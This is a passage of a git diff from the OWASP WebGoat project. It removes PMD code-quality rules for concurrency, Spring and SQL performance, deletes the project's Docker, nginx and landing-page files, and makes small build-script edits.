-(: ConfigurationProperties assumed executed only once, no violation, except if Lombok Setter :)
-and not ((ancestor::TypeDeclaration/Annotation//Name[@Image='ConfigurationProperties'])
-             and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='Setter']))]
-(: non-final and non-volatile fields :)
-/../../..//ClassOrInterfaceDeclaration[@Static=false()]/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Final=false() and @Volatile=false()
-(: field not annotated with framework annotation or GuardedBy :)
-and not (../Annotation//Name[@Image='Autowired' or @Image='PersistenceContext' or @Image='EJB' or @Image='Resource' or @Image='Inject' or @Image='Value' or @Image='GuardedBy'])
-(: field not on accessor method with assignment level annotated with framework annotation :)
-and not (../../ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='Autowired' or @Image='PostConstruct' or @Image='BeforeStep' or @Image='Value' or @Image='Inject']
-/../../..//BlockStatement/Statement//StatementExpression/AssignmentOperator/../PrimaryExpression//@Image=
-./VariableDeclarator/VariableDeclaratorId/@Image)
-(: or field of known mutable types including array :)
-or ((Type/ReferenceType/ClassOrInterfaceType[(pmd-java:typeIs('java.util.Date') or pmd-java:typeIs('java.lang.StringBuilder') or pmd-java:typeIs('java.lang.StringBuffer') or pmd-java:typeIs('java.net.URL') or pmd-java:typeIs('java.io.File')) or
-(ancestor::FieldDeclaration/VariableDeclarator/VariableInitializer[ArrayInitializer and count(ArrayInitializer/VariableInitializer) > 0])])
-(: or in-line allocation of known mutable collection types :)
-or (VariableDeclarator/VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/AllocationExpression[pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet')] )
-(: or in-constructor allocation of known mutable collection types :)
-or (VariableDeclarator/VariableDeclaratorId/@Image = ancestor::ClassOrInterfaceBody//ConstructorDeclaration//StatementExpression/Expression[pmd-java:typeIs('java.util.ArrayList') or pmd-java:typeIs('java.util.HashMap') or pmd-java:typeIs('java.util.HashSet')]/../..//Name/@Image)
-(: not annotated GuardedBy :)
-)
-and not (../Annotation//Name[@Image='GuardedBy'])
-]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="NotProperlySynchronizingOnThisWhileUsingGuardedBy"
-          message="Not properly synchronizing access of field while using @GuardedBy('this')"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="https://jcip.net/annotations/doc/index.html">
-        <description>
-            Problem: The field to which this annotation is applied should only be accessed when holding the built-in 'this' lock by using synchronized.&#13;
-            Solution: Make access thread-safe: synchronize access by method modifier or a synchronized(this) block.&#13;
-            Note that methods with annotations @Autowired, @PostConstruct, @BeforeStep, @Value and @Inject are ignored.
-            (jpinpoint-rules)</description>
-        <priority>3</priority>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//MethodDeclaration[@Synchronized=false()
-and not (../Annotation//Name[@Image='Autowired' or @Image='PostConstruct' or @Image='BeforeStep' or @Image='Value' or @Image='Inject'])]
-//PrimaryPrefix/Name[substring-before(concat(@Image,'.'), '.') =
-ancestor::ClassOrInterfaceBody//Annotation//Name[@Image='GuardedBy']/..//Literal[@Image='"this"']/
-ancestor::ClassOrInterfaceBodyDeclaration/FieldDeclaration//VariableDeclaratorId/@Image
-and (
-not (ancestor::SynchronizedStatement)
-or ancestor::SynchronizedStatement/Expression//Name)]
-]]>
-                </value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-    class Bad1 {
-        @GuardedBy("this")
-        private String txt;
-
-        public String getText() { return txt; } // bad
-        public void setText(String t) { txt = t; } // bad
-    }
-
-    class Good1 {
-        @GuardedBy("this")
-        private String txt;
-
-        public synchronized String getText() { return txt; }
-        public synchronized void setText(String t) { txt = t; }
-    }
-            ]]>
-        </example>
-    </rule>
-
-<!-- END Included file 'concurrent.xml' -->
-<!-- BEGIN Included file 'spring.xml' -->
-    <rule name="AvoidExpressionsInCacheable" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="Avoid SpEL-expression for computing Cacheable key" typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TMSU12">
-        <description>Spring Expression Language (SpEL) expression is used for computing the key dynamically. Problem: evaluating the expression language is expensive, on every call.&#13;
-            Solution: use a custom KeyGenerator: keyGenerator=... instead of key=...
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//ClassOrInterfaceBodyDeclaration//Annotation/NormalAnnotation[Name/@Image='Cacheable']/MemberValuePairs/MemberValuePair[@MemberName='key']
-	]]></value>
-            </property>
-        </properties>
-        <example>
-            <![CDATA[
-class Bad1 {
-    @Cacheable(value = "Cache1", key = "#key1") // bad
-    public String bad1(final String key1) {
-        return getRemote(key1);
-    }
-}
-            ]]>
-        </example>
-    </rule>
-
-    <rule name="AvoidImproperAnnotationCombinations"
-          language="java"
-          message="Don't combine these annotations"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-Annotations"
-          class="net.sourceforge.pmd.lang.rule.XPathRule">
-        <description>
-            Improper combination of annotations. Problem: these annotations are not meant to be combined and may cause unexpected and unwanted behavior.&#13;
-            Solution: remove the inappropriate annotation. &#13;
-            Don't combine 2+ of [@Component, @Service, @Configuration, @Controller, @Repository, @Entity] (Spring/JPA)
-            Don't combine [@Data with @Value] and [@Data or @Value] with any of [@ToString, @EqualsHashCode, @Getter, @Setter, @RequiredArgsConstructor] (Lombok)
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//TypeDeclaration[count(./Annotation/MarkerAnnotation/Name[@Image='Component' or @Image='Service' or @Image='Configuration' or @Image='Controller' or @Image='Repository' or @Image='Entity']) > 1]
-|
-//ClassOrInterfaceBodyDeclaration[count(./Annotation/MarkerAnnotation/Name[@Image='Component' or @Image='Service' or @Image='Configuration' or @Image='Controller' or @Image='Repository' or @Image='Entity']) > 1]
-|
-//TypeDeclaration[count(./Annotation/MarkerAnnotation/Name[@Image='Data' or @Image='Value']) > 1]
-|
-//ClassOrInterfaceBodyDeclaration[count(./Annotation/MarkerAnnotation/Name[@Image='Data' or @Image='Value']) > 1]
-|
-//TypeDeclaration[./Annotation/MarkerAnnotation/Name[@Image='Data' or @Image='Value'] and ./Annotation/MarkerAnnotation/Name[@Image='ToString' or @Image='EqualsAndHashCode' or @Image='Getter' or @Image='Setter' or @Image='RequiredArgsConstructor']]
-|
-//ClassOrInterfaceBodyDeclaration[./Annotation/MarkerAnnotation/Name[@Image='Data' or @Image='Value'] and ./Annotation/MarkerAnnotation/Name[@Image='ToString' or @Image='EqualsAndHashCode' or @Image='Getter' or @Image='Setter' or @Image='RequiredArgsConstructor']]
-                    ]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidModelMapAsRenderParameter" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="A ModelMap or @ModelAttribute is used as parameter of a portlet render method and implicitely put in the session." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TMSU11">
-        <description>Problem: ModelMaps are rather large objects containing explicitly added data and administrative data from Spring. They are added to the Portlet session implicitly. They stay in the session for some time: during session activity and 30 minutes (HTTP timeout) after it, in case the user does not exit explicitly. They occupy heap space during that time, for every user.&#13;
-            Solution: Remove the ModelMap from the render method parameter list and create a new local ModelMap to use in the render request scope.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//ClassOrInterfaceBodyDeclaration
-[MethodDeclaration[@Public='true'] and
-(MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/Type/ReferenceType/ClassOrInterfaceType[typeIs('org.springframework.ui.ModelMap')] or
-MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/Annotation/MarkerAnnotation/Name[@Image='ModelAttribute']) and
-(MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.portlet.RenderRequest') or typeIs('javax.portlet.PortletRequest')] or
-Annotation//Name[@Image='RenderMapping'])]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="AvoidSpringApplicationContextRecreation"
-          message="Avoid re-creation of Spring application context"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-EUOCS01">
-        <description>
-            Problem: When a XXXApplicationContext is created, all Spring beans are initialized, wired and component scanning may take place. Component scanning involves extensive class path scanning which is expensive.&#13;
-            Solution: Create the ApplicationContext only once in the application deployed/live time.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-   //TypeDeclaration/ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration
-/MethodDeclaration//PrimaryExpression/PrimaryPrefix/AllocationExpression/ClassOrInterfaceType[ends-with(@Image, 'ApplicationContext')
-and (
-//ImportDeclaration/Name[starts-with(@Image, 'org.springframework.context')]
-)]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="AvoidSpringMVCMemoryLeaks" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          message="Spring Controller returns an additive expression or a ModelAndView object which may cause a MemoryLeak" typeResolution="true"
-          externalInfoUrl="https://www.jpinpoint.com/doc/Java+Code+Performance">
-        <description>Avoid to return an additive expression for a Spring Controller because it may cause a MemoryLeak.
-            Each new value returned will create a new entry in the View Cache.
-            Also avoid to return a ModelAndView object created using non-static and non-final methods because it may
-            cause a MemoryLeak.
-            Solution: Although multiple solutions exist you can make use of model attributes icw a redirectUrl like
-            redirect:/redirectUrl?someAttribute={someAttribute}.(jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-(
-    //Statement/ReturnStatement
-    [Expression/AdditiveExpression]
-    [ancestor::ClassOrInterfaceBodyDeclaration/Annotation/NormalAnnotation/Name[starts-with(@Image,'RequestMapping')]]
-    [ancestor::CompilationUnit/ImportDeclaration/Name[starts-with(@Image,'org.springframework')]]
-) | (
-    //Block//PrimaryExpression
-    [
-        PrimaryPrefix/Name[ends-with(@Image,'.setViewName')]
-        or (PrimaryPrefix/AllocationExpression/ClassOrInterfaceType[typeIs('org.springframework.web.servlet.ModelAndView')])
-    ]
-    [
-        PrimarySuffix/Arguments/ArgumentList//PrimaryPrefix/Name[
-            (@Image = ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-            or (@Image = ancestor::ClassOrInterfaceBody//FieldDeclaration[@Final='false']//VariableDeclaratorId/@Image)]
-    |
-            PrimaryPrefix/AllocationExpression/Arguments/ArgumentList/Expression[1]/PrimaryExpression/PrimaryPrefix/Name[
-            (@Image = ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-            or (@Image = ancestor::ClassOrInterfaceBody//FieldDeclaration[@Final='false']//VariableDeclaratorId/@Image)]
-    |
-            PrimaryPrefix/AllocationExpression/Arguments/ArgumentList/Expression//Arguments//PrimaryExpression/PrimaryPrefix/Name[
-            (@Image = ancestor::MethodDeclaration//VariableDeclaratorId/@Image)
-            or (@Image = ancestor::ClassOrInterfaceBody//FieldDeclaration[@Final='false']//VariableDeclaratorId/@Image)]
-    ]
-)
-            ]]></value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="MakeAutoWiredConstructedFieldFinal"
-          message="Make autowired, constructed field final in objects shared among threads."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TUTC07">
-        <description>
-            Problem: Multiple threads typically access fields of a singleton or may access fields in session scoped objects. If a field or its reference is mutable, non-autowired access is thread-unsafe and may cause corruption or visibility problems. To make this thread-safe, that is, guard the field e.g. with synchronized methods, may cause contention. &#13;
-            Solution: Make the fields final and unmodifiable to defend against mutation. If they really need to be mutable (which is strange for autowired fields), make access thread-safe. Thread-safety can be achieved e.g. by proper synchronization and use the @GuardedBy annotation or use of volatile.&#13;
-            Notes&#13;
-            1. Autowiring/injection is thread safe, yet make sure no other thread-unsafe assignment is made to that field.&#13;
-            2. In case you are sure the Component is used in single threaded context only (e.g. a Tasklet), annotate the class with @NotThreadSafe to make this explicit. &#13;
-            3. Use package-private and @VisibleForTesting for methods (e.g. setters) used for JUnit only.
-            (jpinpoint-rules)</description>
-        <priority>4</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-	//TypeDeclaration/Annotation//Name[(@Image='Component' or @Image='Service' or @Image='Controller' or @Image='Repository' or
-(@Image='Singleton' and ancestor::TypeDeclaration/Annotation/NormalAnnotation/MemberValuePairs//Name[@Image='ConcurrencyManagementType.BEAN']))
-and not (ancestor::TypeDeclaration/Annotation/NormalAnnotation/Name[@Image='Scope']/..//Literal[@Image='"request"' or @Image='"prototype"'])
-and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='NotThreadSafe'])
-and not ((ancestor::TypeDeclaration/Annotation/NormalAnnotation/Name[@Image='ConfigurationProperties'])
-             and not (ancestor::TypeDeclaration/Annotation/MarkerAnnotation/Name[@Image='Setter']))]
-/../../..//ClassOrInterfaceDeclaration[@Static='false']/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/FieldDeclaration[@Final='false' and @Volatile='false'
-and not (../Annotation//Name[@Image='Autowired' or @Image='PersistenceContext' or @Image='EJB' or @Image='Resource' or @Image='Inject' or @Image='Value' or @Image='GuardedBy'])
-and  (../../ClassOrInterfaceBodyDeclaration/Annotation//Name[@Image='Autowired']
-/../../../ConstructorDeclaration//BlockStatement/Statement//StatementExpression/AssignmentOperator/../PrimaryExpression//@Image=
-./VariableDeclarator/VariableDeclaratorId/@Image)
-]
-]]>
-                </value>
-            </property>
-        </properties>
-    </rule>
-
-    <rule name="MinimizeActionModelMapInSession" class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java" message="ModelMap in action method is not cleared. This may bloat the session." typeResolution="true"
-          externalInfoUrl="http://www.jpinpoint.com/doc/Java+Code+Performance#JavaCodePerformance-TMSU12">
-        <description>A ModelMap is used in an action method typically for form validation and not cleared. Problem: the ModelMap is put in the session by Spring. This is typically a large object which may bloat the session.&#13;
-            Solution: clear the ModelMap right after the validation in the happy flow.
-            (jpinpoint-rules)</description>
-        <priority>2</priority>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value><![CDATA[
-//ClassOrInterfaceBodyDeclaration
-[MethodDeclaration[@Public='true'] and
-MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/Type/ReferenceType/ClassOrInterfaceType[typeIs('org.springframework.ui.ModelMap')] and
-(MethodDeclaration/MethodDeclarator/FormalParameters/FormalParameter/Type/ReferenceType/ClassOrInterfaceType[typeIs('javax.portlet.ActionRequest')] or
-Annotation//Name[@Image='ActionMapping']) and
-count(.//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image,'.clear')])=0]
-	]]></value>
-            </property>
-        </properties>
-    </rule>
-
-<!-- END Included file 'spring.xml' -->
-<!-- BEGIN Included file 'sql.xml' -->
-    <rule name="AvoidHugeQueryFetchSize"
-          message="Avoid a huge query fetch size, it consumes much memory."
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Data+Access+Performance#JavaDataAccessPerformance-IDA-TRM03">
-        <description>
-            Problem: if huge numbers of result rows are fetched these are all stored in memory and this may introduce long gc times and out of memory risk.&#13;
-            Solution: Set fetch size to 100 maximally. Only set it higher than 100 yet still max 500, if you are sure there is only little data returned per row, like 3 rather short columns.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="1.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//MethodDeclaration//PrimaryExpression[PrimaryPrefix/Name[ends-with(@Image, '.setFetchSize')]
-[ancestor::PrimaryExpression/PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Literal[@Image > 500]]]
-|
-//MethodDeclaration//PrimaryExpression[PrimaryPrefix/Name[ends-with(@Image, '.setFetchSize')]
-[ancestor::PrimaryExpression/PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name[@Image =
-ancestor::ClassOrInterfaceBody//VariableDeclarator/VariableDeclaratorId/@Image
-[ancestor::VariableDeclarator/VariableInitializer/Expression/PrimaryExpression/PrimaryPrefix/Literal[@Image > 500]]]]]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="AvoidMultipleRoundtripsForQuery"
-          message="Avoid multiple roundtrips for the same query"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Data+Access+Performance#JavaDataAccessPerformance-IDA-TRR05">
-        <description>
-            Problem: Time is taken by the unnecessary roundtrip(s). Unnecessary work is performed.&#13;
-            Solution: Execute the query only once.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-//MethodDeclaration/Block//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, '.getSingleResult')]
-[ancestor::MethodDeclaration[count(.//VariableInitializer/Expression/PrimaryExpression/PrimarySuffix[@Image='createQuery']) = 1
-and
-count(.//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, '.getResultList')]) +
-count(.//PrimaryExpression/PrimaryPrefix/Name[ends-with(@Image, '.getSingleResult')])
-> 1]]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-    <rule name="AvoidSqlInExpression"
-          message="Avoid a SQL IN-Expression, it fails for > 1000 arguments and pollutes the query plan cache / statement cache"
-          class="net.sourceforge.pmd.lang.rule.XPathRule" deprecated="false" dfa="false" language="java"
-          typeResolution="true" externalInfoUrl="http://www.jpinpoint.com/doc/Java+Data+Access+Performance#JavaDataAccessPerformance-IDA-INO01">
-        <description>
-            Problem: The number of values for the IN-argument list is limited, in Oracle to 1000. An error occurs when exceeding this limit. Additionally, a large IN list takes much time to transport to the database and be parsed. Moreover, each number of IN values used in a query results in a separate cache entry in e.g. the Prepared Statement Cache of the application server and in the Hibernate Query Plan Cache, resulting in higher memory usage and/or low cache hit ratio.&#13;
-            Solution: Rewrite the query by replacing the IN-argument list by a sub query using the criteria used to fetch the IN arguments. Or often even better performing, an inner join using these criteria (depending on indexes etc. - recommended to test to be sure.) This way, the select and update are combined into one, which will also save one roundtrip.
-            (jpinpoint-rules)</description>
-        <properties>
-            <property name="version" value="2.0"/>
-            <property name="xpath">
-                <value>
-                    <![CDATA[
-
-//ClassOrInterfaceDeclaration/ClassOrInterfaceBody/ClassOrInterfaceBodyDeclaration/MethodDeclaration/Block
-//Expression/PrimaryExpression/PrimaryPrefix/Name[@Image='InExpression.in']
-|
-//TypeDeclaration/Annotation/SingleMemberAnnotation/Name[@Image='NamedQueries']
-/../MemberValue//PrimaryExpression/PrimaryPrefix/Literal[contains(@Image, 'WHERE') and
-(contains(@Image, ' IN(:') or contains(@Image, ' IN (:') or contains(@Image, ' IN :') or contains(@Image, ' IN ( :')) ]
-|
-//LocalVariableDeclaration/VariableDeclarator/VariableInitializer//PrimaryPrefix[Literal[contains(@Image, ' IN') and contains(@Image, ':')]
-and starts-with(Literal[(contains(@Image, ' IN') and contains(@Image, ':'))]/
-substring-after(substring-after(@Image, ' IN'), ':')
-,
-ancestor::MethodDeclaration//BlockStatement//PrimaryPrefix/Name[ends-with(@Image, '.setParameter')]
-/../../PrimarySuffix/Arguments/ArgumentList[Expression/PrimaryExpression/PrimaryPrefix/Name[@Image != 'Arrays.asList']]/Expression/PrimaryExpression/PrimaryPrefix/Literal/substring-before(substring-after(@Image, '"'),'"'))
-and
-ancestor::MethodDeclaration//BlockStatement//PrimaryPrefix/Name[ends-with(@Image, '.setParameter')]
-/../../PrimarySuffix/Arguments/ArgumentList/Expression/PrimaryExpression/PrimaryPrefix/Name[@Image != 'Arrays.asList']
-]
-]]>
-                </value>
-            </property>
-        </properties>
-        <priority>2</priority>
-    </rule>
-
-<!-- END Included file 'sql.xml' -->
-</ruleset>
\ No newline at end of file
diff --git a/docker/Dockerfile b/docker/Dockerfile
deleted file mode 100644
index b0e63fe82..000000000
--- a/docker/Dockerfile
+++ /dev/null
@@ -1,22 +0,0 @@
-FROM eclipse-temurin:17_35-jdk-focal
-
-RUN apt-get update
-RUN useradd -ms /bin/bash webgoat
-RUN apt-get -y install apt-utils nginx
-RUN chgrp -R 0 /home/webgoat
-RUN chmod -R g=u /home/webgoat
-
-USER webgoat
-
-COPY --chown=webgoat nginx.conf /etc/nginx/nginx.conf
-COPY --chown=webgoat index.html /usr/share/nginx/html/
-COPY --chown=webgoat target/webgoat-server-*.jar /home/webgoat/webgoat.jar
-COPY --chown=webgoat target/webwolf-*.jar /home/webgoat/webwolf.jar
-COPY --chown=webgoat start.sh /home/webgoat
-RUN chmod +x /home/webgoat/start.sh
-
-EXPOSE 8080
-EXPOSE 9090
-
-WORKDIR /home/webgoat
-ENTRYPOINT ["./start.sh"]
diff --git a/docker/Readme.md b/docker/Readme.md
deleted file mode 100644
index 7d0831655..000000000
--- a/docker/Readme.md
+++ /dev/null
@@ -1,13 +0,0 @@
-# Docker all-in-one image
-
-## Docker build
-
-```shell
-docker build --no-cache --build-arg webgoat_version=8.2.0-SNAPSHOT -t webgoat/goatandwolf:latest .
-```
-	
-## Docker run
-
-```shell
-docker run -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:latest
-```
\ No newline at end of file
diff --git a/docker/index.html b/docker/index.html
deleted file mode 100644
index 43d3457f0..000000000
--- a/docker/index.html
+++ /dev/null
@@ -1,70 +0,0 @@
-<!DOCTYPE html>
-<html>
-<head>
-    <meta name="viewport" content="width=device-width, initial-scale=1">
-    <style>
-
-        .p1 {
-            font-family: Arial, Helvetica, sans-serif;
-        }
-
-        .webgoat {
-            float: left;
-            margin-right: 250px;
-            text-align: center;
-        }
-
-        .webwolf {
-            float: left;
-            width: 40%;
-            height: 40%;
-            text-align: center;
-        }
-
-        #images {
-            display: flex;
-            align-items: center;
-            justify-content: center;
-        }
-
-        body {
-
-            text-align: center;
-
-        }
-    </style>
-</head>
-<body>
-
-
-<h1>
-    <center>
-        Landing page for WebGoat and WebWolf
-    </center>
-</h1>
-<blockquote class="p1">
-    WebGoat is a deliberately insecure web application maintained by <a href="http://www.owasp.org/">OWASP</a> designed
-    to teach web
-    application security lessons.
-
-    This program is a demonstration of common server-side application flaws. The
-    exercises are intended to be used by people to learn about application security and
-    penetration testing techniques.
-</blockquote>
-
-<br/>
-
-<p class="p1">Click on one of the images to go to WebGoat or WebWolf</p>
-
-<br/>
-<br/>
-
-<div id="images">
-    <a href="http://127.0.0.1:8080/WebGoat" title="Open WebGoat" target="_blank"><img class="webgoat"
-                                                                                      src="http://127.0.0.1:8080/WebGoat/css/img/logoBG.jpg"></a>
-    <a href="http://127.0.0.1:9090/WebWolf" title="Open WebWolf" target="_blank"><img class="webwolf"
-                                                                                      src="http://127.0.0.1:9090/images/wolf.png"></a>
-</div>
-
-</body>
-</html>
diff --git a/docker/nginx.conf b/docker/nginx.conf
deleted file mode 100644
index 1ca404260..000000000
--- a/docker/nginx.conf
+++ /dev/null
@@ -1,140 +0,0 @@
-error_log /tmp/error.log;
-pid /tmp/nginx.pid;
-
-worker_processes 1;
-
-events { worker_connections 1024; }
-
-http {
-
-	client_body_temp_path /tmp/client_body;
-	fastcgi_temp_path /tmp/fastcgi_temp;
-	proxy_temp_path /tmp/proxy_temp;
-	scgi_temp_path /tmp/scgi_temp;
-	uwsgi_temp_path /tmp/uwsgi_temp;
-
-    sendfile on;
-
-    upstream docker-webgoat {
-        server 127.0.0.1:8080;
-    }
-
-    upstream docker-webwolf {
-        server 127.0.0.1:9090;
-    }
-
-    proxy_set_header   Host $host;
-    proxy_set_header   X-Real-IP $remote_addr;
-    proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;
-    proxy_set_header   X-Forwarded-Host $server_name;
-
-    server {
-        listen 8888;
-        server_name        www.webgoat.local;
-		
-		root /var/www;
- 
-		access_log /tmp/goataccess.log;
-		error_log /tmp/goaterror.log;
-
-        location ~* \.(png|jpg|jpeg|gif|ico|woff|otf|ttf|mvc|svg|txt|pdf|docx?|xlsx?)$ {
-            access_log         off;
-            proxy_pass         http://docker-webgoat;
-            proxy_redirect     off;
-        }
-
-        location / {
-            root              /usr/share/nginx/html;
-            index             index.html;
-            add_header        Cache-Control no-cache;
-            expires           0;
-        }
-
-        location /WebGoat {
-            proxy_pass         http://docker-webgoat;
-            proxy_redirect     off;
-        }
-
-    }
-
-    server {
-        listen 8888;
-        server_name        www.webwolf.local;
-		
-		root /var/www;
- 
-		access_log /tmp/wolfaccess.log;
-		error_log /tmp/wolferror.log;
-
-        location /WebGoat/PasswordReset/ForgotPassword/create-password-reset-link {
-            proxy_pass         http://docker-webgoat;
-            proxy_redirect     off;
-        }
-
-        location /PasswordReset/reset/reset-password {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /files {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /tmpdir {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /webjars {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /css {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /login {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /images {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /mail {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /upload {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /js {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /landing {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /logout {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-        location /WebWolf {
-            proxy_pass         http://docker-webwolf;
-            proxy_redirect     off;
-        }
-
-    }
-}
diff --git a/docker/pom.xml b/docker/pom.xml
deleted file mode 100644
index 8bb17f6a3..000000000
--- a/docker/pom.xml
+++ /dev/null
@@ -1,40 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-all-in-one-docker</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-       
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-            <groupId>org.apache.maven.plugins</groupId>
-            <artifactId>maven-antrun-plugin</artifactId>
-            <version>3.0.0</version>
-            <executions>
-                <execution>
-                    <phase>install</phase>
-                    <configuration>
-                        <target>
-                            <copy file="../webgoat-server/target/webgoat-server-${project.version}.jar" tofile="target/webgoat-server-${project.version}.jar"/>
-							<copy file="../webwolf/target/webwolf-${project.version}.jar" tofile="target/webwolf-${project.version}.jar"/>
-                        </target>
-                    </configuration>
-                    <goals>
-                        <goal>run</goal>
-                    </goals>
-                </execution>
-            </executions>
-			</plugin>
-        </plugins>
-    </build>
-
-</project>
diff --git a/docs/README.md b/docs/README.md
index dde40936b..ec3085b27 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1,5 +1,5 @@
 # WebGoat landing page
 
-Old Github page which now redirects to OWASP website.
+Old GitHub page which now redirects to OWASP website.
 
 
diff --git a/mvn-debug b/mvn-debug
index 066900f60..422467b12 100755
--- a/mvn-debug
+++ b/mvn-debug
@@ -1,2 +1,2 @@
 export MAVEN_OPTS="-Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000"
-mvn $@
+./mvnw $@
diff --git a/pom.xml b/pom.xml
index 0cf890ec0..172788d01 100644
--- a/pom.xml
+++ b/pom.xml
@@ -4,33 +4,30 @@
 
     <modelVersion>4.0.0</modelVersion>
     <groupId>org.owasp.webgoat</groupId>
-    <artifactId>webgoat-parent</artifactId>
-    <packaging>pom</packaging>
+    <artifactId>webgoat</artifactId>
+    <packaging>jar</packaging>
     <version>8.2.3-SNAPSHOT</version>
 
     <parent>
